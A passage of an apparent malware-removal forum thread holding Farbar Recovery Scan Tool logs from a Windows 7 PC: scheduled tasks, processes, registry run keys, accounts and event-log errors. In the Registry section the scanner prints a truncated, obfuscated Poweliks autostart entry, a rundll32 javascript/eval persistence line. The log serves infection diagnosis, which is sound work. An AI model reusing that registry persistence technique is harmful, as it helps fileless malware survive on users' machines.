System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.) Task: {1F1F653A-9A63-4693-A116-3801A0037465} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-11-11] (Adobe Systems Incorporated) Task: {1FC54D89-1B6C-4516-8C55-88DBB102F513} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2014-10-17] (Apple Inc.) Task: {2FB88A66-255E-4A6A-A935-E740E57BAF93} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.) Task: {40AC2BF1-F61D-4558-B612-A4BA032B00C7} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation) Task: {4BD843C3-CFEA-40A4-9AE5-9C55460199CA} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation) Task: {4F161FB8-515E-44F8-B090-EBA22AED117E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [2014-08-10] (Google Inc.) Task: {668ACBED-DED4-49A0-BF68-DEA3DED3165A} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation) Task: {7496BE44-E7B5-4B6D-99ED-83342B76092D} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2014-03-19] (Microsoft Corporation) Task: {77877023-269F-4E8B-B766-EBB3BC7D4AD1} - System32\Tasks\HP AR Program Upload - b6f1b5de96b0434191ee7a5939bcdd2fed889e11d632473bb14d345dcf17970a => C:\Program Files\HP\HP ENVY 4500 series\bin\HPRewards.exe [2014-03-06] (TODO: <Company name>) Task: {7DCE01C5-DA32-4944-9E28-BD300B1CE1CD} - System32\Tasks\Microsoft Office 15 Sync Maintenance for Swintal-PC-Swintal Swintal-PC => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-09-16] (Microsoft Corporation) Task: {81F4DB92-CFD7-4E7B-AE0E-F77A560732A9} - System32\Tasks\ASUS\i-Setup132150 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.) Task: {84E00E03-EFA2-40C3-A897-3B5ED119201A} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2014-03-19] (Microsoft Corporation) Task: {8BFD38ED-AEEE-4BF9-A623-86D53F843A53} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2014-09-25] (Microsoft Corporation) Task: {AE001CD3-A7A1-42E3-9B33-B152E1D23274} - System32\Tasks\ASUS\i-Setup132035 => C:\Windows\Chipset\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.) Task: {C9CA414C-B003-452A-9D78-C78A251B18E7} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => C:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2014-03-19] (Microsoft) Task: {DB2AFA52-A0DE-4770-BDEA-1CE2AE2C6C30} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {F71B3540-246F-452A-B331-044D7D4C5D0D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2014-08-26] (Microsoft Corporation) Task: {FA4859D3-569B-462F-90CE-053288C3DEC7} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express Self Updater\ExpressSelfUpdater.exe [2014-07-23] () Task: {FFAE2AEB-409D-4600-A1EA-B0633B5EC4FF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-03-01] (Google Inc.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000Core.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-4134620719-2527629264-1752102789-1000UA.job => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2014-03-01 12:32 - 2012-10-29 02:48 - 00927232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe 2014-03-01 16:22 - 2014-07-02 13:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-03-03 09:26 - 2014-05-20 08:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll 2014-10-25 07:48 - 2014-09-09 09:59 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\Office15\1033\GrooveIntlResource.dll 2014-09-26 11:31 - 2014-09-26 11:31 - 00393376 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream64.dll 2014-02-12 19:58 - 2014-02-12 19:58 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll 2014-03-01 12:32 - 2014-11-11 21:30 - 00031232 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\PEbiosinterface32.dll 2014-03-01 12:32 - 2012-05-07 11:04 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.01\ATKEX.dll 2014-10-25 07:48 - 2014-09-09 08:12 - 08896160 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Microsoft Office\Office15\1033\GrooveIntlResource.dll 2012-09-24 08:24 - 2012-09-24 08:24 - 00020480 _____ () C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\Interfaces.dll 2014-03-02 14:28 - 2013-12-08 20:23 - 00732160 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libGLESv2.dll 2014-03-02 14:28 - 2013-12-08 20:32 - 00854016 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\platforms\qwindows.dll 2014-03-02 14:28 - 2013-12-08 20:23 - 00047104 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\libEGL.dll 2014-03-02 14:28 - 2013-12-08 20:31 - 00021504 _____ () C:\Program Files (x86)\Navigraph\FMS Data Manager\imageformats\qico.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 01042760 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libglesv2.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 00211272 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\libegl.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 08910664 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\pdf.dll 2014-10-28 09:00 - 2014-10-21 23:04 - 01681224 _____ () C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll 2014-01-03 01:59 - 2014-02-10 12:04 - 00430080 _____ () C:\Windows\mod_frst.exe ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:00934A10 AlternateDataStreams: C:\ProgramData\TEMP:74603393 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ========================= Accounts: ========================== Administrator (S-1-5-21-4134620719-2527629264-1752102789-500 - Administrator - Disabled) Brian (S-1-5-21-4134620719-2527629264-1752102789-1004 - Limited - Enabled) => C:\Users\Brian Guest (S-1-5-21-4134620719-2527629264-1752102789-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-4134620719-2527629264-1752102789-1003 - Limited - Enabled) Swintal (S-1-5-21-4134620719-2527629264-1752102789-1000 - Administrator - Enabled) => C:\Users\Swintal ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY) Description: Chrome has encountered a fatal error. ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: ) Description: An unspecified error occurred during System Restore: (Installed Navtech PBS). Additional information: 0x80070005. Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1 Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712 Exception code: 0x40000015 Fault offset: 0x00000000000324ad Faulting process id: 0x44c Faulting application start time: 0xsvchost.exe_stisvc0 Faulting application path: svchost.exe_stisvc1 Faulting module path: svchost.exe_stisvc2 Report Id: svchost.exe_stisvc3 Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: Flash32_15_0_0_223.ocx, version: 15.0.0.223, time stamp: 0x544ecba4 Exception code: 0xc0000005 Fault offset: 0x005e96c7 Faulting process id: 0x1f28 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17344, time stamp: 0x4a5bc6b7 Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7 Exception code: 0xc0000005 Fault offset: 0x000379ed Faulting process id: 0x73c Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe_stisvc, version: 6.1.7600.16385, time stamp: 0x4a5bc3c1 Faulting module name: HPWia2_EN4500.dll, version: 30.0.411.0, time stamp: 0x505b7712 Exception code: 0x40000015 Fault offset: 0x00000000000324ad Faulting process id: 0x538 Faulting application start time: 0xsvchost.exe_stisvc0 Faulting application path: svchost.exe_stisvc1 Faulting module path: svchost.exe_stisvc2 Report Id: svchost.exe_stisvc3 Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (11/11/2014 09:33:35 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/11/2014 09:32:18 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The Windows Image Acquisition (WIA) service terminated unexpectedly. It has done this 1 time(s). Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Garmin Core Update Service service failed to start due to the following error: %%1053 Error: (11/11/2014 09:31:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Garmin Core Update Service service to connect. Error: (11/11/2014 09:09:54 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The IPsec Policy Agent service failed to start due to the following error: %%1053 Error: (11/11/2014 09:08:42 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the IPsec Policy Agent service to connect. Error: (11/11/2014 09:07:13 PM) (Source: BugCheck) (EventID: 1001) (User: ) Description: 0x00000024 (0x00000000001904fb, 0xfffff880033385e8, 0xfffff88003337e40, 0xfffff80002eb8c50)C:\Windows\MEMORY.DMP111114-30482-01 Error: (11/11/2014 09:07:13 PM) (Source: EventLog) (EventID: 6008) (User: ) Description: The previous system shutdown at 5:30:10 PM on ‎11/‎11/‎2014 was unexpected. Error: (11/11/2014 04:20:44 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Microsoft Office Sessions: ========================= Error: (11/11/2014 09:35:56 PM) (Source: Chrome) (EventID: 1) (User: NT AUTHORITY) Description: Chrome has encountered a fatal error. ver=38.0.2125.111;lang=;guid=1E499807DE364B569E83CEEACDEA246E;is_machine=1;oop=1;upload=1;minidump=C:\Program Files (x86)\Google\CrashReports\7d62fd68-5e25-4b57-9e2b-329ba36424f1.dmp Error: (11/11/2014 09:33:02 PM) (Source: System Restore) (EventID: 8210) (User: ) Description: Installed Navtech PBS0x80070005 Error: (11/11/2014 09:32:13 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 09:31:59 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad44c01cffe20ca755d39C:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll139dab8c-6a14-11e4-af9d-ac220b2a544f Error: (11/11/2014 09:08:40 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:38:31 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7Flash32_15_0_0_223.ocx15.0.0.223544ecba4c0000005005e96c71f2801cffdf6c5f923c7C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Macromed\Flash\Flash32_15_0_0_223.ocx141502f9-69eb-11e4-b41e-ac220b2a544f Error: (11/11/2014 04:21:14 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.173444a5bc6b7ntdll.dll6.1.7601.18247521ea8e7c0000005000379ed73c01cffdf55f40e0d4C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\ntdll.dllaa530802-69e8-11e4-b41e-ac220b2a544f Error: (11/11/2014 04:17:52 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (11/11/2014 04:17:44 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe_stisvc6.1.7600.163854a5bc3c1HPWia2_EN4500.dll30.0.411.0505b77124000001500000000000324ad53801cffdf4e146e30dC:\Windows\system32\svchost.exeC:\Windows\system32\HPWia2_EN4500.dll2ca5b8e0-69e8-11e4-b41e-ac220b2a544f Error: (11/11/2014 04:10:10 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 ==================== Memory info =========================== Processor: Intel® Core i7-4771 CPU @ 3.50GHz Percentage of memory in use: 22% Total physical RAM: 16322.27 MB Available physical RAM: 12717.07 MB Total Pagefile: 32642.72 MB Available Pagefile: 28962.79 MB Total Virtual: 8192 MB Available Virtual: 8191.84 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:931.41 GB) (Free:721.61 GB) NTFS Drive e: (Second Drive) (Fixed) (Total:931.51 GB) (Free:844.12 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: ACBBF63B) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 76A56381) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== End Of Log ============================
  3. rampantfox83
    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014 Ran by Swintal (administrator) on SWINTAL-PC on 11-11-2014 21:37:28 Running from C:\Users\Swintal\Desktop Loaded Profile: Swintal (Available profiles: Swintal & Brian) Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe () C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe (ESET) C:\Program Files\ESET\ESET Smart Security\x86\ekrn.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe (Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\msosync.exe (Microsoft Corporation) C:\Windows\System32\wbengine.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe (Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe (Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe (Google Inc.) C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe (PI Engineering) C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Navigraph) C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Apple Inc.) E:\iTunes\iTunesHelper.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\System32\vds.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleChromeDAV.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Hewlett-Packard Co.) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7188552 2013-05-27] (Realtek Semiconductor) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2464072 2014-11-06] (NVIDIA Corporation) HKLM\...\Run: [shadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET Smart Security\egui.exe [5595336 2014-10-01] (ESET) HKLM-x32\...\Run: [uSB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-25] (Intel Corporation) HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Navigraph FMS Data Manager] => C:\Program Files (x86)\Navigraph\FMS Data Manager\NGFMSAgent.exe [1006576 2014-06-03] (Navigraph) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.) HKLM-x32\...\Run: [iTunesHelper] => E:\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [GoogleDriveSync] => C:\Program Files (x86)\Google\Drive\googledrivesync.exe [22869088 2014-10-21] (Google) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [HP ENVY 4500 series (NET)] => C:\Program Files\HP\HP ENVY 4500 series\Bin\ScanToPCActivationApp.exe [3487240 2014-03-06] (Hewlett-Packard Co.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google Update] => C:\Users\Swintal\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2014-08-10] (Google Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [Google+ Auto Backup] => C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe [3746120 2014-08-12] (Google Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [43816 2014-10-20] (Apple Inc.) HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2014-07-23] (Garmin Ltd or its subsidiaries) Startup: C:\Users\Swintal\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MacroWorks 3.1.lnk ShortcutTarget: MacroWorks 3.1.lnk -> C:\Program Files (x86)\PI Engineering\MacroWorks 3.1\MacroWorks 3r.exe (PI Engineering) ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL (Microsoft Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear SearchScopes: HKCU - {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms} BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll (Microsoft 